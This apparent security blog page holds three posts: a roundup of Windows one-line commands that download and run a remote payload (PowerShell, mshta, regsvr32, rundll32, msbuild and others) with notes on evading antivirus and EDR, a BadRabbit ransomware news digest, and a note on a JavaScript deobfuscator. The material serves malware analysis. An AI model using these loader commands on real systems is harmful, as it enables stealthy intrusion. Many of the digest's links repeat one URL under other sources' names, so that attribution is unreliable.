How a malware can download a remote payload and execute malicious code…in one line?

This post on arno0x0x‘s blog is awesome: an accurate analysis of some ‘one-line commands’ that can be used on a windows system in order to download a malicious payload and execute it.

The examples are developed using several script languages, it works in memory with a minimal disk footprint and are “proxy aware”, so can be executed also from a corporate network.

Priceless informations for any malware analyst!

Prerequisites

  • allow for execution of arbitrary code – because spawning calc.exe is cool, but has its limits huh ?
  • allow for downloading its payload from a remote server – because your super malware/RAT/agent will probably not fit into a single command line, does it ?
  • be proxy aware – because which company doesn’t use a web proxy for outgoing traffic nowadays ?
  • make use of as standard and widely deployed Microsoft binaries as possible – because you want this command line to execute on as much systems as possible
  • be EDR friendly – oh well, Office spawning cmd.exe is already a bad sign, but what about powershell.exe or cscript.exe downloading stuff from the internet ?
  • work in memory only – because your final payload might get caught by AV when written on disk

Examples

Powershell

powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"

Process performing network call: powershell.exe
Payload written on disk: NO

Cmd

cmd.exe /k < \\webdavserver\folder\batchfile.txt

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Cscript/Wscript

cscript //E:jscript \\webdavserver\folder\payload.txt

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Mshta

mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))

Process performing network call: mshta.exe
Payload written on disk: IE local cache

Rundll32

rundll32 \\webdavserver\folder\payload.dll,entrypoint

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Regasm/Regsvc

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Regsvr32

regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll

Process performing network call: regsvr32.exe
Payload written on disk: IE local cache

Msbuild

cmd /V/c"set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache


For more information and examples, plese refer to arno0x0x‘a article:

Windows oneliners to download remote payload and execute arbitrary code

How to recover files encrypted by BadRabbit ransomware?

Researchers at Kaspersky Lab has discovered that some victims may be able to recover their files without paying any ransom.

 

The discovery was made by that analyzed the encryption functionality implemented by the ransomware: the Bad Rabbit leverages the open source library DiskCryptor in order to encrypt the user files, but uses the same screen to allows victims who have received the decryption key to enter it and boot their system.

Kaspersky’s researchers discovered that after the ransomware create the decryption key, this isn’t wiped from memory.

The symmetric encryption keys are securely generated on the ransomware side which makes attempts to guess the keys unfeasible in practice.

However, we found a flaw in the code of dispci.exe:

the malware doesn’t wipe the generated password from the memory, which means that there is a slim chance to extract it before the dispci.exe process terminates.

Unfortunately, there is only a “slim chance” that victims will be able to extract the password.
However, Bad Rabbit does not delete shadow copies, allowing victims to restore the files through this windows backup functionality:

We have discovered that Bad Rabbit does not delete shadow copies after encrypting the victim’s files. It means that if the shadow copies had been enabled prior to infection and if the full disk encryption did not occur for some reason, then the victim can restore the original versions of the encrypted files by the means of the standard Windows mechanism or 3rd-party utilities.


More information on securelist.com:

Bad Rabbit ransomware

 

BadRabbit ransomware: suggested readings

Spreads via network, currently hits Russia, Ukraine, Germany, Japan, and Turkey

 

A variant of Petya/NotPetya/EternalPetya called BadRabbit and probably prepared by the same authors has infected several big Russian media outlets.

BadRabbit uses SMB to propagate laterally with a hardcoded list of usernames and passwords.

However, unlike NotPetya, it doesn’t use EternalBlue.

Below some suggested readings regarding this threat:


darkreading.com

A wave of ransomware infections is hitting hundreds of government, media, transportation, and other targets in Eastern Europe today mainly in Russia and Ukraine, but also in Bulgaria, Germany, and Turkey.

Among the most high-profile targets thus far are major news outlets such as Russia’s Interfax Agency, and Ukraine’s Kiev Metro, its Odessa International Airport, and ministries of infrastructure and finance.

https://www.darkreading.com/attacks-breaches/bad-rabbit-ransomware-attacks-rock-russia-ukraine—and-beyond/d/d-id/1330208


us-cert.gov

US-CERT discourages individuals and organizations from paying the ransom, as this does not guarantee that access will be restored. Using unpatched and unsupported software may increase the risk of proliferation of cybersecurity threats, such as ransomware.

https://www.darkreading.com/attacks-breaches/bad-rabbit-ransomware-attacks-rock-russia-ukraine—and-beyond/d/d-id/1330208


welivesecurity.com

ESET discovered that in the case of the Kiev Metro, the malware used for the cyberattack was Diskcoder.D, — a new variant of ransomware known also as Petya.

https://www.darkreading.com/attacks-breaches/bad-rabbit-ransomware-attacks-rock-russia-ukraine—and-beyond/d/d-id/1330208

infosecurity-magazine.com

BadRabbit was first spotted attacking Russian media outlets on Tuesday, including the news agency Interfax, according to security firm Group-IB, which posted a screenshot of the ransom screen. Other security firms have followed with their own early research and detections, with the consensus being that the malware is a variant of the Petya ransomware.

https://twitter.com/GroupIB_GIB/status/922819835494649856/photo/1

The attackers are demanding 0.05 bitcoin as ransom — or about $280 at the going exchange rate.

https://www.darkreading.com/attacks-breaches/bad-rabbit-ransomware-attacks-rock-russia-ukraine—and-beyond/d/d-id/1330208


kaspersky.com

According to our findings, the attack doesn’t use exploits. It is a drive-by attack: Victims download a fake Adobe Flash installer from infected websites and manually launch the .exe file, thus infecting themselves.

https://www.darkreading.com/attacks-breaches/bad-rabbit-ransomware-attacks-rock-russia-ukraine—and-beyond/d/d-id/1330208


malwarebytes.com

Countries we know to be impacted so far are Russia, Ukraine, Turkey, Bulgaria, and Germany, with attacks centered on targets as wide-ranging as infrastructure, transportation, and media outlets.

The dropper is an executable that pretends to be a Flash update. The malware must run with Administration privileges, but no UAC bypass technique has been deployed — it relies purely on social engineering, trying to convince the user to elevate it.

https://www.darkreading.com/attacks-breaches/bad-rabbit-ransomware-attacks-rock-russia-ukraine—and-beyond/d/d-id/1330208

 

https://www.darkreading.com/attacks-breaches/bad-rabbit-ransomware-attacks-rock-russia-ukraine—and-beyond/d/d-id/1330208


nakedsecurity.sophos.com

If Bad Rabbit infects your computer, it attempts to spread across the network using a list of usernames and passwords buried inside the malware.

These credentials include passwords straight out of a worst passwords list.

https://www.darkreading.com/attacks-breaches/bad-rabbit-ransomware-attacks-rock-russia-ukraine—and-beyond/d/d-id/1330208


isc.sans.edu

It seems to be delivered via malicious URL as fake flash update:

1dnscontrol[.]com/flash_install.php

https://www.darkreading.com/attacks-breaches/bad-rabbit-ransomware-attacks-rock-russia-ukraine—and-beyond/d/d-id/1330208


bloomberg.com

Russian business newswire Interfax suffered a hacker attack that made part of its services unavailable to subscribers, according to a statement Tuesday.

https://www.darkreading.com/attacks-breaches/bad-rabbit-ransomware-attacks-rock-russia-ukraine—and-beyond/d/d-id/1330208


soursefrontnews.eu

The virus like Petya.A, which hit computers around the world in late June, today, October 24, infected computers of the Kyiv Metro, a source told Front News International.

https://www.darkreading.com/attacks-breaches/bad-rabbit-ransomware-attacks-rock-russia-ukraine—and-beyond/d/d-id/1330208


securityaffairs.co

A new massive ransomware campaign is rapidly spreading around Europe, the malware dubbed Bad Rabbit has already affected over 200 major organizations mainly in Russia, Ukraine, Germany, Japan, and Turkey in a few hours.

https://www.darkreading.com/attacks-breaches/bad-rabbit-ransomware-attacks-rock-russia-ukraine—and-beyond/d/d-id/1330208


securityweek.com

Infected computers display a screen informing users that their files have been encrypted and instructing them to access a website over the Tor anonymity network.

The Tor site tells victims to pay 0.05 bitcoin, worth roughly $283, to obtain the key needed to recover the encrypted files.

https://www.darkreading.com/attacks-breaches/bad-rabbit-ransomware-attacks-rock-russia-ukraine—and-beyond/d/d-id/1330208


thehackernews.com

Bad Rabbit ransomware uses DiskCryptor, an open source full drive encryption software, to encrypt files on infected computers with RSA 2048 keys.

 

https://www.darkreading.com/attacks-breaches/bad-rabbit-ransomware-attacks-rock-russia-ukraine—and-beyond/d/d-id/1330208


threatpost.com

The infpub.dat file prominent in today’s attack will also install another malicious executable called dispci.exe.

It creates tasks in the registry to launch the executable; the tasks are named after the dragons in Game of Thrones: Viserion, Drogon and Rhaegal.

There’s also a reference to a Game of Thrones character GrayWorm in the code.

https://www.darkreading.com/attacks-breaches/bad-rabbit-ransomware-attacks-rock-russia-ukraine—and-beyond/d/d-id/1330208


trendmicro.com

Initial reports peg the main casualties as transport systems and media outlets in Ukraine and Russia. The Ukranian arm of CERT (CERT-UA) has also issued an advisory warning of further potential ransomware attacks.

https://www.darkreading.com/attacks-breaches/bad-rabbit-ransomware-attacks-rock-russia-ukraine—and-beyond/d/d-id/1330208


Twitter

 

 

 

IlluminateJs: a good Javascript Deobfuscator

Useful during analysis of malicious sites

Yesterday in my twitter stream i’ve seen this tweet by Florian Roth:

During the analysis of a malicious site, one of the first step is the deobfuscation of the suspicious javascript.

There are a lot of tools (online or standalone) that can help the analyst during this step, but IlluminateJs from my point orf view is one of the most complete and accurate.

Consider it like JSDetox, but on steroids.

IlluminateJs core is a Babel compiler plugin and it works entirely in your browser, no server interaction is needed to perform deobfuscation.

Features

  • Extended constant propagation
  • Array mutators tracking
  • Mixed-type expressions evaluation
  • Support modern JavaScript (ES6)
  • Function calls evaluation
  • Built-in function evaluation
  • Loops evaluation
  • Procedure inlining

References

https://illuminatejs.com